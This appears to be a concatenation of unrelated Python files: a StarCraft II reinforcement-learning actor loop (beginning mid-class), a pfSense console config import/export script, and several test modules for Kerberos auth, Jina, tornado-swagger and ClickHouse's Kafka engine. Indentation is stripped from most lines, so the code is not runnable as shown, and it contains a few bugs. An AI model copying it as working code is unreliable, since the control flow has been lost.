self.thread = threading.Thread(target=self.run, args=())
self.thread.daemon = True # Daemonize thread
self.is_running = True
self.is_start = False
self.use_replay_expert_reward = use_replay_expert_reward
self.replay_path = replay_path
self.replay_version = replay_version
def start(self):
self.is_start = True
self.thread.start()
# background
def run(self):
try:
self.is_running = True
"""A run loop to have agents and an environment interact."""
total_frames = 0
total_episodes = 0
results = [0, 0, 0]
start_time = time()
print("start_time before training:", strftime("%Y-%m-%d %H:%M:%S", localtime(start_time)))
while time() - start_time < self.max_time_for_training:
self.opponent, _ = self.player.get_match()
agents = [self.player, self.opponent]
# if self.use_replay_expert_reward:
run_config = run_configs.get(version=self.replay_version) # the replays released by blizzard are all 3.16.1 version
with self.create_env(self.player, self.opponent) as env:
# set the obs and action spec
observation_spec = env.observation_spec()
action_spec = env.action_spec()
for agent, obs_spec, act_spec in zip(agents, observation_spec, action_spec):
agent.setup(obs_spec, act_spec)
self.teacher.setup(self.player.agent.obs_spec, self.player.agent.action_spec)
print('player:', self.player) if debug else None
print('opponent:', self.opponent) if debug else None
print('teacher:', self.teacher) if 1 else None
trajectory = []
start_time = time() # in seconds.
print("start_time before reset:", strftime("%Y-%m-%d %H:%M:%S", localtime(start_time)))
                    # one opponent match (which may include several games) lasts by default for no more than 2 hours
while time() - start_time < self.max_time_per_one_opponent:
# Note: the pysc2 environment don't return z
# AlphaStar: home_observation, away_observation, is_final, z = env.reset()
total_episodes += 1
print("total_episodes:", total_episodes)
timesteps = env.reset()
for a in agents:
a.reset()
# check the condition that the replay is over but the game is not
with run_config.start(full_screen=False) as controller:
# here we must use the with ... as ... statement, or it will cause an error
#controller = run_config.start(full_screen=False)
# start replay reward
raw_affects_selection = False
raw_crop_to_playable_area = False
screen_resolution = point.Point(64, 64)
minimap_resolution = point.Point(64, 64)
camera_width = 24
interface = sc_pb.InterfaceOptions(
raw=True,
score=True,
# Omit to disable.
feature_layer=sc_pb.SpatialCameraSetup(width=camera_width),
# Omit to disable.
render=None,
# By default cloaked units are completely hidden. This shows some details.
show_cloaked=False,
# By default burrowed units are completely hidden. This shows some details for those that produce a shadow.
show_burrowed_shadows=False,
# Return placeholder units (buildings to be constructed), both for raw and feature layers.
show_placeholders=False,
# see below
raw_affects_selection=raw_affects_selection,
# see below
raw_crop_to_playable_area=raw_crop_to_playable_area
)
screen_resolution.assign_to(interface.feature_layer.resolution)
minimap_resolution.assign_to(interface.feature_layer.minimap_resolution)
replay_files = os.listdir(self.replay_path)
                            # randomly select a replay file from the candidate replays
random.shuffle(replay_files)
replay_path = self.replay_path + replay_files[0]
print('replay_path:', replay_path)
replay_data = run_config.replay_data(replay_path)
start_replay = sc_pb.RequestStartReplay(
replay_data=replay_data,
options=interface,
disable_fog=False, # FLAGS.disable_fog
observed_player_id=1, # FLAGS.observed_player
map_data=None,
realtime=False
)
controller.start_replay(start_replay)
feat = F.features_from_game_info(game_info=controller.game_info(),
use_feature_units=True, use_raw_units=True,
use_unit_counts=True, use_raw_actions=True,
show_cloaked=True, show_burrowed_shadows=True,
show_placeholders=True)
replay_obs = None
replay_bo = []
replay_o = controller.observe()
replay_obs = feat.transform_obs(replay_o)
# end replay reward
[home_obs, away_obs] = timesteps
is_final = home_obs.last()
player_memory = self.player.agent.initial_state()
opponent_memory = self.opponent.agent.initial_state()
teacher_memory = self.teacher.initial_state()
# initial build order
player_bo = []
episode_frames = 0
# default outcome is 0 (means draw)
outcome = 0
# in one episode (game)
#
start_episode_time = time() # in seconds.
print("start_episode_time before is_final:", strftime("%Y-%m-%d %H:%M:%S", localtime(start_episode_time)))
while not is_final:
total_frames += 1
episode_frames += 1
# run_loop: actions = [agent.step(timestep) for agent, timestep in zip(agents, timesteps)]
player_step = self.player.agent.step_logits(home_obs, player_memory)
player_function_call, player_action, player_logits, player_new_memory = player_step
print("player_function_call:", player_function_call) if debug else None
opponent_step = self.opponent.agent.step_logits(away_obs, opponent_memory)
opponent_function_call, opponent_action, opponent_logits, opponent_new_memory = opponent_step
# Q: how to do it ?
# teacher_logits = self.teacher(home_obs, player_action, teacher_memory)
# may change implemention of teacher_logits
teacher_step = self.teacher.step_logits(home_obs, teacher_memory)
teacher_function_call, teacher_action, teacher_logits, teacher_new_memory = teacher_step
print("teacher_function_call:", teacher_function_call) if debug else None
env_actions = [player_function_call, opponent_function_call]
player_action_spec = action_spec[0]
action_masks = U.get_mask(player_action, player_action_spec)
z = None
timesteps = env.step(env_actions)
[home_next_obs, away_next_obs] = timesteps
# print the observation of the agent
# print("home_obs.observation:", home_obs.observation)
reward = home_next_obs.reward
print("reward: ", reward) if debug else None
is_final = home_next_obs.last()
# calculate the build order
player_bo = L.calculate_build_order(player_bo, home_obs.observation, home_next_obs.observation)
print("player build order:", player_bo) if debug else None
# calculate the unit counts of bag
player_ucb = L.calculate_unit_counts_bow(home_obs.observation).reshape(-1).numpy().tolist()
print("player unit count of bow:", sum(player_ucb)) if debug else None
# start replay_reward
                                # note: the controller should step the same number of steps as the RL actor (keep the timing the same)
controller.step(STEP_MUL)
replay_next_o = controller.observe()
replay_next_obs = feat.transform_obs(replay_next_o)
# calculate the build order for replay
replay_bo = L.calculate_build_order(replay_bo, replay_obs, replay_next_obs)
print("replay build order:", player_bo) if debug else None
# calculate the unit counts of bag for replay
replay_ucb = L.calculate_unit_counts_bow(replay_obs).reshape(-1).numpy().tolist()
print("replay unit count of bow:", sum(replay_ucb)) if debug else None
# end replay_reward
game_loop = home_obs.observation.game_loop[0]
print("game_loop", game_loop)
# note, original AlphaStar pseudo-code has some mistakes, we modified
# them here
traj_step = Trajectory(
observation=home_obs.observation,
opponent_observation=away_obs.observation,
memory=player_memory,
z=z,
masks=action_masks,
action=player_action,
behavior_logits=player_logits,
teacher_logits=teacher_logits,
is_final=is_final,
reward=reward,
build_order=player_bo,
z_build_order=replay_bo, # we change it to the sampled build order
unit_counts=player_ucb,
z_unit_counts=replay_ucb, # we change it to the sampled unit counts
game_loop=game_loop,
)
trajectory.append(traj_step)
player_memory = tuple(h.detach() for h in player_new_memory)
opponent_memory = tuple(h.detach() for h in opponent_new_memory)
teacher_memory = tuple(h.detach() for h in teacher_new_memory)
home_obs = home_next_obs
away_obs = away_next_obs
# for replay reward
replay_obs = replay_next_obs
replay_o = replay_next_o
if is_final:
outcome = reward
print("outcome: ", outcome) if 1 else None
results[outcome + 1] += 1
if len(trajectory) >= AHP.sequence_length:
trajectories = U.stack_namedtuple(trajectory)
if self.player.learner is not None:
if self.player.learner.is_running:
print("Learner send_trajectory!")
self.player.learner.send_trajectory(trajectories)
trajectory = []
else:
print("Learner stops!")
print("Actor also stops!")
return
# use max_frames to end the loop
# whether to stop the run
if self.max_frames and total_frames >= self.max_frames:
print("Beyond the max_frames, return!")
return
# use max_frames_per_episode to end the episode
if self.max_frames_per_episode and episode_frames >= self.max_frames_per_episode:
print("Beyond the max_frames_per_episode, break!")
break
# end of replay
if replay_o.player_result:
print(replay_o.player_result)
break
self.coordinator.send_outcome(self.player, self.opponent, outcome)
# use max_frames_per_episode to end the episode
if self.max_episodes and total_episodes >= self.max_episodes:
print("Beyond the max_episodes, return!")
print("results: ", results) if 1 else None
print("win rate: ", results[2] / (1e-8 + sum(results))) if 1 else None
return
# close the replays
except Exception as e:
print("ActorLoop.run() Exception cause return, Detials of the Exception:", e)
print(traceback.format_exc())
finally:
self.is_running = False
# create env function
def create_env(self, player, opponent, game_steps_per_episode=GAME_STEPS_PER_EPISODE,
step_mul=STEP_MUL, version=None,
# the map should be the same as in the expert replay
map_name="AbyssalReef", random_seed=1):
player_aif = AgentInterfaceFormat(**AAIFP._asdict())
opponent_aif = AgentInterfaceFormat(**AAIFP._asdict())
agent_interface_format = [player_aif, opponent_aif]
# create env
print('map name:', map_name)
print('player.name:', player.name)
print('opponent.name:', opponent.name)
print('player.race:', player.race)
print('opponent.race:', opponent.race)
env = SC2Env(map_name=map_name,
players=[Agent(player.race, player.name),
Agent(opponent.race, opponent.name)],
step_mul=step_mul,
game_steps_per_episode=game_steps_per_episode,
agent_interface_format=agent_interface_format,
version=version,
random_seed=random_seed)
return env
|
config_pfsense.py
|
#!/usr/bin/env python3
# scripts/config_pfsense.py
#
# Import/Export script for vIOS.
#
# @author Alain Degreffe <[email protected]>
# @copyright 2016 Alain Degreffe
# @license http://www.gnu.org/licenses/gpl.html
# @link http://www.unetlab.com/
# @version 20160422
import getopt, multiprocessing, os, pexpect, re, sys, time
conntimeout = 3 # Maximum time for console connection
expctimeout = 3 # Maximum time for each short expect
longtimeout = 30 # Maximum time for each long expect
timeout = 60 # Maximum run time (conntimeout is included)
def node_login(handler):
# Send an empty line, and wait for the login prompt
i = -1
while i == -1:
try:
handler.sendline('\r\n')
i = handler.expect([
'Enter an option:',
'.*root.*:'], timeout = 5)
except:
i = -1
if i == 0:
# Need to send username and password
handler.sendline('8')
try:
handler.expect('.*root.*:', timeout = expctimeout)
return True
except:
print('ERROR: error waiting for "root:" prompt.')
node_quit(handler)
return False
elif i == 1:
# nothing to do
return True
else:
# Unexpected output
node_quit(handler)
return False
def node_quit(handler):
if handler.isalive() == True:
handler.sendline('exit\n')
handler.close()
def config_get(handler):
# Getting the config
handler.setwinsize(100, 120)
handler.sendline('cat /conf/config.xml | awk \'{print $0}\'\n')
#handler.sendline('cat `ls -rt /conf/backup/config-* | tail -1 `\n')
try:
handler.expect('</pfsense>', timeout = longtimeout)
except:
print('ERROR: error waiting for "#" prompt.')
node_quit(handler)
return False
config = handler.before.decode()
# Manipulating the config
config = re.sub('\r', '', config, flags=re.DOTALL) # Unix style
config = config + '</pfsense>\n';
config = re.sub('.*<\?xml version=\"1.0\"\?>', '<?xml version=\"1.0\"?>', config, flags=re.DOTALL) # Header
return config
def config_put(handler):
while True:
try:
i = handler.expect('Do you want to set up VLANs now.*', timeout)
break
except:
return False
handler.sendline('')
handler.sendline('\n')
handler.sendline('mount -t cd9660 /dev/cd0 /mnt\n')
handler.sendline('cp /mnt/config.xml /conf/\n')
handler.sendline('exit\n')
while True:
try:
i = handler.expect('option:', timeout)
except:
return False
return True
def usage():
print('Usage: %s <standard options>' %(sys.argv[0]))
print('Standard Options:')
print('-a <s> *Action can be:')
print(' - get: get the startup-configuration and push it to a file')
print(' - put: put the file as startup-configuration')
print('-f <s> *File')
print('-p <n> *Console port')
print('-t <n> Timeout in seconds (default = %i ms)' %(timeout))
print('* Mandatory option')
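# Example invocations (a sketch; the console port and file path below are hypothetical):
#   python3 config_pfsense.py -a get -p 32769 -f /tmp/pfsense-config.xml -t 30
#   python3 config_pfsense.py -a put -p 32769 -f /tmp/pfsense-config.xml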
def now():
# Return current UNIX time in milliseconds
return int(round(time.time() * 1000))
def main(action, filename, port):
try:
# Connect to the device
tmp = conntimeout
while (tmp > 0):
handler = pexpect.spawn('telnet 127.0.0.1 %i' %(port))
time.sleep(0.1)
tmp = tmp - 0.1
if handler.isalive() == True:
break
if (handler.isalive() != True):
print('ERROR: cannot connect to port "%i".' %(port))
node_quit(handler)
sys.exit(1)
if action == 'get':
rc = node_login(handler)
if rc != True:
print('ERROR: failed to login.')
node_quit(handler)
sys.exit(1)
config = config_get(handler)
if config in [False, None]:
print('ERROR: failed to retrieve config.')
node_quit(handler)
sys.exit(1)
try:
fd = open(filename, 'a')
fd.write(config)
fd.close()
except:
print('ERROR: cannot write config to file.')
node_quit(handler)
sys.exit(1)
elif action == 'put':
rc = config_put(handler)
if rc != True:
print('ERROR: failed to push config.')
node_quit(handler)
sys.exit(1)
# Remove lock file
lock = '%s/.lock' %(os.path.dirname(filename))
if os.path.exists(lock):
os.remove(lock)
# Mark as configured
configured = '%s/.configured' %(os.path.dirname(filename))
if not os.path.exists(configured):
open(configured, 'a').close()
node_quit(handler)
sys.exit(0)
except Exception as e:
print('ERROR: got an exception')
print(type(e)) # the exception instance
print(e.args) # arguments stored in .args
print(e) # __str__ allows args to be printed directly,
node_quit(handler)
return False
if __name__ == "__main__":
action = None
filename = None
port = None
# Getting parameters from command line
try:
opts, args = getopt.getopt(sys.argv[1:], 'a:p:t:f:', ['action=', 'port=', 'timeout=', 'file='])
except getopt.GetoptError as e:
usage()
sys.exit(3)
for o, a in opts:
if o in ('-a', '--action'):
action = a
elif o in ('-f', '--file'):
filename = a
elif o in ('-p', '--port'):
try:
port = int(a)
except:
port = -1
elif o in ('-t', '--timeout'):
try:
timeout = int(a) * 1000
except:
timeout = -1
else:
print('ERROR: invalid parameter.')
# Checking mandatory parameters
if action is None or port is None or filename is None:
usage()
print('ERROR: missing mandatory parameters.')
sys.exit(1)
if action not in ['get', 'put']:
usage()
print('ERROR: invalid action.')
sys.exit(1)
if timeout < 0:
usage()
print('ERROR: timeout must be 0 or higher.')
sys.exit(1)
if port < 0:
usage()
print('ERROR: port must be 32768 or higher.')
sys.exit(1)
if action == 'get' and os.path.exists(filename):
usage()
print('ERROR: destination file already exists.')
sys.exit(1)
if action == 'put' and not os.path.exists(filename):
usage()
print('ERROR: source file does not exist.')
sys.exit(1)
if action == 'put':
try:
fd = open(filename, 'r')
config = fd.read()
fd.close()
except:
usage()
print('ERROR: cannot read from file.')
sys.exit(1)
# Backgrounding the script
end_before = now() + timeout
p = multiprocessing.Process(target=main, name="Main", args=(action, filename, port))
p.start()
while (p.is_alive() and now() < end_before):
# Waiting for the child process to end
time.sleep(1)
if p.is_alive():
# Timeout occurred
print('ERROR: timeout occurred.')
p.terminate()
sys.exit(127)
if p.exitcode != 0:
sys.exit(127)
sys.exit(0)
|
test_ext_kerberos.py
|
#!/usr/bin/env python
# encoding: utf-8
"""Test Kerberos extension."""
from nose.tools import eq_, nottest, ok_, raises
from threading import Lock, Thread
from time import sleep, time
import sys
class MockHTTPKerberosAuth(object):
def __init__(self, **kwargs):
self._lock = Lock()
self._calls = set()
self._items = []
def __call__(self, n):
with self._lock:
ok_(not self._items)
self._items.append(n)
sleep(0.25)
with self._lock:
thread = self._items.pop()
eq_(thread, n)
self._calls.add(thread)
class MockModule(object):
def __init__(self):
self.HTTPKerberosAuth = MockHTTPKerberosAuth
sys.modules['requests_kerberos'] = MockModule()
from hdfs.ext.kerberos import _HdfsHTTPKerberosAuth
class TestKerberosClient(object):
def test_max_concurrency(self):
auth = _HdfsHTTPKerberosAuth(1, mutual_auth='OPTIONAL')
t1 = Thread(target=auth.__call__, args=(1, ))
t1.start()
t2 = Thread(target=auth.__call__, args=(2, ))
t2.start()
t1.join()
t2.join()
eq_(auth._calls, set([1, 2]))
|
test_remote.py
|
import threading
import time
import unittest
from jina.logging import get_logger
from jina.parser import set_gateway_parser, set_pea_parser
from jina.peapods.pod import GatewayPod
from jina.peapods.remote import PeaSpawnHelper
from tests import JinaTestCase
class MyTestCase(JinaTestCase):
def test_logging_thread(self):
_event = threading.Event()
logger = get_logger('mytest', event_trigger=_event)
def _print_messages():
while True:
_event.wait()
print(f'thread: {_event.record}')
print(type(_event.record))
_event.clear()
t = threading.Thread(target=_print_messages)
t.daemon = True
t.start()
logger.info('blah, blah')
logger.info('blah, blah, blah')
time.sleep(.1)
logger.warning('warn, warn, warn')
time.sleep(.1)
logger.debug('warn, warn, warn')
time.sleep(.1)
logger.success('crit')
time.sleep(.1)
def tearDown(self) -> None:
time.sleep(2)
super().tearDown()
def test_remote_not_allowed(self):
f_args = set_gateway_parser().parse_args([])
p_args = set_pea_parser().parse_args(['--host', 'localhost', '--port-expose', str(f_args.port_expose)])
with GatewayPod(f_args):
PeaSpawnHelper(p_args).start()
def test_cont_gateway(self):
f1_args = set_gateway_parser().parse_args(['--allow-spawn'])
f2_args = set_gateway_parser().parse_args([])
with GatewayPod(f1_args):
pass
with GatewayPod(f2_args):
pass
if __name__ == '__main__':
unittest.main()
|
test_setup.py
|
import multiprocessing
import socket
import time
from contextlib import closing
import pytest
import tornado.httpclient
import tornado.ioloop
import tornado.web
from tornado_swagger.setup import export_swagger, setup_swagger
SERVER_START_TIMEOUT = 3
SWAGGER_URL = "/api/doc"
def find_free_port():
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.bind(("", 0))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return s.getsockname()[1]
class ExampleHandler(tornado.web.RequestHandler):
def get(self):
"""
Description end-point
---
tags:
- Example
summary: Create user
description: This can only be done by the logged in user.
operationId: examples.api.api.createUser
produces:
- application/json
"""
self.write({})
class Application(tornado.web.Application):
routes = [tornado.web.url(r"/api/example", ExampleHandler)]
def __init__(self):
setup_swagger(
self.routes,
swagger_url=SWAGGER_URL,
)
super(Application, self).__init__(self.routes)
def test_export_swagger():
assert export_swagger(Application.routes)
def server_holder(port):
app = Application()
app.listen(port=port)
tornado.ioloop.IOLoop.current().start()
@pytest.fixture()
def server():
port = find_free_port()
server_holder_process = multiprocessing.Process(target=server_holder, args=(port,))
server_holder_process.start()
time.sleep(SERVER_START_TIMEOUT)
yield port
server_holder_process.terminate()
server_holder_process.join()
def test_swagger_setup_integration(server):
client = tornado.httpclient.HTTPClient()
response = client.fetch("http://localhost:{0}{1}".format(server, SWAGGER_URL))
assert "Swagger UI" in response.body.decode()
@pytest.fixture()
def swaggered_app():
return Application()
|
test.py
|
import json
import os.path as p
import random
import socket
import subprocess
import threading
import time
import io
import avro.schema
import avro.io
import avro.datafile
from confluent_kafka.avro.cached_schema_registry_client import CachedSchemaRegistryClient
from confluent_kafka.avro.serializer.message_serializer import MessageSerializer
from confluent_kafka import admin
import kafka.errors
import pytest
from google.protobuf.internal.encoder import _VarintBytes
from helpers.client import QueryRuntimeException
from helpers.cluster import ClickHouseCluster
from helpers.network import PartitionManager
from helpers.test_tools import TSV
from kafka import KafkaAdminClient, KafkaProducer, KafkaConsumer
from kafka.admin import NewTopic
"""
protoc --version
libprotoc 3.0.0
# to create kafka_pb2.py
protoc --python_out=. kafka.proto
"""
from . import kafka_pb2
from . import social_pb2
# TODO: add a test for run-time offset updates in CH when the offset is manually changed on the Kafka side.
# TODO: add a test that SELECT LIMIT works.
cluster = ClickHouseCluster(__file__)
instance = cluster.add_instance('instance',
main_configs=['configs/kafka.xml', 'configs/log_conf.xml'],
with_kafka=True,
with_zookeeper=True,
macros={"kafka_broker":"kafka1",
"kafka_topic_old":"old",
"kafka_group_name_old":"old",
"kafka_topic_new":"new",
"kafka_group_name_new":"new",
"kafka_client_id":"instance",
"kafka_format_json_each_row":"JSONEachRow"},
clickhouse_path_dir='clickhouse_path')
kafka_id = ''
# Helpers
def check_kafka_is_available():
p = subprocess.Popen(('docker',
'exec',
'-i',
kafka_id,
'/usr/bin/kafka-broker-api-versions',
'--bootstrap-server',
'INSIDE://localhost:9092'),
stdout=subprocess.PIPE)
p.communicate()
return p.returncode == 0
def wait_kafka_is_available(max_retries=50):
retries = 0
while True:
if check_kafka_is_available():
break
else:
retries += 1
if retries > max_retries:
raise "Kafka is not available"
print("Waiting for Kafka to start up")
time.sleep(1)
def producer_serializer(x):
return x.encode() if isinstance(x, str) else x
def kafka_produce(topic, messages, timestamp=None, retries=2):
producer = KafkaProducer(bootstrap_servers="localhost:9092", value_serializer=producer_serializer, retries=retries, max_in_flight_requests_per_connection=1)
for message in messages:
producer.send(topic=topic, value=message, timestamp_ms=timestamp)
producer.flush()
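# Usage sketch (assumes the test broker is reachable on localhost:9092, as in the helpers above;
# the topic name is hypothetical):
#   kafka_produce('some_topic', [json.dumps({'key': i, 'value': i}) for i in range(10)])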
## just to ensure the python client / producer is working properly
def kafka_producer_send_heartbeat_msg(max_retries=50):
kafka_produce('test_heartbeat_topic', ['test'], retries=max_retries)
def kafka_consume(topic):
consumer = KafkaConsumer(bootstrap_servers="localhost:9092", auto_offset_reset="earliest")
consumer.subscribe(topics=(topic,))
for toppar, messages in list(consumer.poll(5000).items()):
if toppar.topic == topic:
for message in messages:
yield message.value.decode()
consumer.unsubscribe()
consumer.close()
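# Usage sketch (hypothetical topic name): drain whatever is currently readable from a topic.
#   for value in kafka_consume('some_topic'):
#       print(value)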
def kafka_produce_protobuf_messages(topic, start_index, num_messages):
data = b''
for i in range(start_index, start_index + num_messages):
msg = kafka_pb2.KeyValuePair()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer = KafkaProducer(bootstrap_servers="localhost:9092", value_serializer=producer_serializer)
producer.send(topic=topic, value=data)
producer.flush()
print(("Produced {} messages for topic {}".format(num_messages, topic)))
def kafka_produce_protobuf_messages_no_delimeters(topic, start_index, num_messages):
data = ''
producer = KafkaProducer(bootstrap_servers="localhost:9092")
for i in range(start_index, start_index + num_messages):
msg = kafka_pb2.KeyValuePair()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
producer.send(topic=topic, value=serialized_msg)
producer.flush()
print("Produced {} messages for topic {}".format(num_messages, topic))
def kafka_produce_protobuf_social(topic, start_index, num_messages):
data = b''
for i in range(start_index, start_index + num_messages):
msg = social_pb2.User()
msg.username='John Doe {}'.format(i)
msg.timestamp=1000000+i
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer = KafkaProducer(bootstrap_servers="localhost:9092", value_serializer=producer_serializer)
producer.send(topic=topic, value=data)
producer.flush()
print(("Produced {} messages for topic {}".format(num_messages, topic)))
def avro_message(value):
schema = avro.schema.make_avsc_object({
'name': 'row',
'type': 'record',
'fields': [
{'name': 'id', 'type': 'long'},
{'name': 'blockNo', 'type': 'int'},
{'name': 'val1', 'type': 'string'},
{'name': 'val2', 'type': 'float'},
{'name': 'val3', 'type': 'int'}
]
})
bytes_writer = io.BytesIO()
# writer = avro.io.DatumWriter(schema)
# encoder = avro.io.BinaryEncoder(bytes_writer)
# writer.write(value, encoder)
# DataFileWriter seems to be mandatory to get the schema encoded
writer = avro.datafile.DataFileWriter(bytes_writer, avro.io.DatumWriter(), schema)
if isinstance(value, list):
for v in value:
writer.append(v)
else:
writer.append(value)
writer.flush()
raw_bytes = bytes_writer.getvalue()
writer.close()
bytes_writer.close()
return raw_bytes
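# Usage sketch (hypothetical topic name): encode one row matching the schema above and publish it.
#   kafka_produce('avro_topic', [avro_message({'id': 0, 'blockNo': 0, 'val1': 'AM', 'val2': 0.5, 'val3': 1})])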
def avro_confluent_message(schema_registry_client, value):
# type: (CachedSchemaRegistryClient, dict) -> str
serializer = MessageSerializer(schema_registry_client)
schema = avro.schema.make_avsc_object({
'name': 'row',
'type': 'record',
'fields': [
{'name': 'id', 'type': 'long'},
{'name': 'blockNo', 'type': 'int'},
{'name': 'val1', 'type': 'string'},
{'name': 'val2', 'type': 'float'},
{'name': 'val3', 'type': 'int'}
]
})
return serializer.encode_record_with_schema('test_subject', schema, value)
# Since everything is async and shaky when receiving messages from Kafka,
# we may want to try and check results multiple times in a loop.
def kafka_check_result(result, check=False, ref_file='test_kafka_json.reference'):
fpath = p.join(p.dirname(__file__), ref_file)
with open(fpath) as reference:
if check:
assert TSV(result) == TSV(reference)
else:
return TSV(result) == TSV(reference)
def describe_consumer_group(name):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
consumer_groups = admin_client.describe_consumer_groups([name])
res = []
for member in consumer_groups[0].members:
member_info = {}
member_info['member_id'] = member.member_id
member_info['client_id'] = member.client_id
member_info['client_host'] = member.client_host
member_topics_assignment = []
for (topic, partitions) in member.member_assignment.assignment:
member_topics_assignment.append({'topic': topic, 'partitions': partitions})
member_info['assignment'] = member_topics_assignment
res.append(member_info)
return res
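# Usage sketch: inspect the members of a consumer group created by one of the tests below.
#   members = describe_consumer_group('new')
#   print(members[0]['client_id'], members[0]['assignment'])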
# Fixtures
@pytest.fixture(scope="module")
def kafka_cluster():
try:
global kafka_id
cluster.start()
kafka_id = instance.cluster.kafka_docker_id
print(("kafka_id is {}".format(kafka_id)))
yield cluster
finally:
cluster.shutdown()
@pytest.fixture(autouse=True)
def kafka_setup_teardown():
instance.query('DROP DATABASE IF EXISTS test; CREATE DATABASE test;')
wait_kafka_is_available() # ensure kafka is alive
kafka_producer_send_heartbeat_msg() # ensure python kafka client is ok
# print("kafka is available - running test")
yield # run test
# Tests
@pytest.mark.timeout(180)
def test_kafka_settings_old_syntax(kafka_cluster):
assert TSV(instance.query("SELECT * FROM system.macros WHERE macro like 'kafka%' ORDER BY macro",
ignore_error=True)) == TSV('''kafka_broker kafka1
kafka_client_id instance
kafka_format_json_each_row JSONEachRow
kafka_group_name_new new
kafka_group_name_old old
kafka_topic_new new
kafka_topic_old old
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka('{kafka_broker}:19092', '{kafka_topic_old}', '{kafka_group_name_old}', '{kafka_format_json_each_row}', '\\n');
''')
# Don't insert malformed messages since old settings syntax
# doesn't support skipping of broken messages.
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('old', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group('old')
assert members[0]['client_id'] == 'ClickHouse-instance-test-kafka'
# text_desc = kafka_cluster.exec_in_container(kafka_cluster.get_container_id('kafka1'),"kafka-consumer-groups --bootstrap-server localhost:9092 --describe --members --group old --verbose"))
@pytest.mark.timeout(180)
def test_kafka_settings_new_syntax(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = '{kafka_broker}:19092',
kafka_topic_list = '{kafka_topic_new}',
kafka_group_name = '{kafka_group_name_new}',
kafka_format = '{kafka_format_json_each_row}',
kafka_row_delimiter = '\\n',
kafka_client_id = '{kafka_client_id} test 1234',
kafka_skip_broken_messages = 1;
''')
messages = []
for i in range(25):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('new', messages)
# Insert a couple of malformed messages.
kafka_produce('new', ['}{very_broken_message,'])
kafka_produce('new', ['}another{very_broken_message,'])
messages = []
for i in range(25, 50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('new', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group('new')
assert members[0]['client_id'] == 'instance test 1234'
@pytest.mark.timeout(180)
def test_kafka_json_as_string(kafka_cluster):
kafka_produce('kafka_json_as_string', ['{"t": 123, "e": {"x": "woof"} }', '', '{"t": 124, "e": {"x": "test"} }',
'{"F1":"V1","F2":{"F21":"V21","F22":{},"F23":"V23","F24":"2019-12-24T16:28:04"},"F3":"V3"}'])
instance.query('''
CREATE TABLE test.kafka (field String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_json_as_string',
kafka_group_name = 'kafka_json_as_string',
kafka_format = 'JSONAsString',
kafka_flush_interval_ms=1000;
''')
result = instance.query('SELECT * FROM test.kafka;')
expected = '''\
{"t": 123, "e": {"x": "woof"} }
{"t": 124, "e": {"x": "test"} }
{"F1":"V1","F2":{"F21":"V21","F22":{},"F23":"V23","F24":"2019-12-24T16:28:04"},"F3":"V3"}
'''
assert TSV(result) == TSV(expected)
assert instance.contains_in_log(
"Parsing of message (topic: kafka_json_as_string, partition: 0, offset: 1) return no rows")
@pytest.mark.timeout(120)
def test_kafka_formats(kafka_cluster):
# data was dumped from clickhouse itself in the following manner
# clickhouse-client --format=Native --query='SELECT toInt64(number) as id, toUInt16( intDiv( id, 65536 ) ) as blockNo, reinterpretAsString(19777) as val1, toFloat32(0.5) as val2, toUInt8(1) as val3 from numbers(100) ORDER BY id' | xxd -ps | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
all_formats = {
## Text formats ##
# dumped with clickhouse-client ... | perl -pe 's/\n/\\n/; s/\t/\\t/g;'
'JSONEachRow': {
'data_sample': [
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"1","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"2","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"3","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"4","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"5","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"6","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"7","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"8","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"9","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"10","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"11","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"12","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"13","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"14","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"15","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
],
'supports_empty_value': True,
},
# JSONAsString doesn't fit to that test, and tested separately
'JSONCompactEachRow': {
'data_sample': [
'["0", 0, "AM", 0.5, 1]\n',
